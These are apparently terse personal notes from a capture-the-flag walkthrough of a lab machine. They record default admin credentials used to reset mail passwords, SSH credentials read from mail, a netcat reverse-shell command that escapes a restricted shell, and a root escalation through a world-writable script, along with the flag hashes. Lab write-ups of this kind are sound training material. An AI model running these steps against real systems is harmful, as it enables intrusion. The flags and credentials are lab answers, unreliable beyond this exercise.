IP: 10.10.10.51
Recon
Possible username: webadmin@solid-state-security.com
https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7
https://blog.mailtrap.io/how-to-test-smtp-server/
telnet 10.10.10.51 4555
root
root
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword <username> <new pw>
telnet 10.10.10.51 110
user john
pass asdfghj
https://electrictoolbox.com/pop3-commands/
john
-> top 1 1
telnet ip 110
user mindy
pass asdfghj
list
top 2 20
Got ssh creds
mindy:P@55W0rd1!2@
- log in
user.txt
914d0a4ebc177889b5b89a23f556fd75
Privesc
users(/etc/passwd):
james
mindy
root
- We are in
rbash
so we must exit/upgrade it to a normal shell!
Exiting rbash
https://github.com/Elinpf/OSCP-survival-guide
ssh mindy@10.10.10.51 nc 10.10.14.12 1337 -e /bin/sh
- run linpeas
/opt/tmp.py
is 777
download it -> edit it locally -> upload to /dev/shm -> copy to /opt/tmp.py instead of mving cuz we dont have enough priv to write inside /opt
wait!
Got root
b4c9723a28899b1c45db281d99cc87c9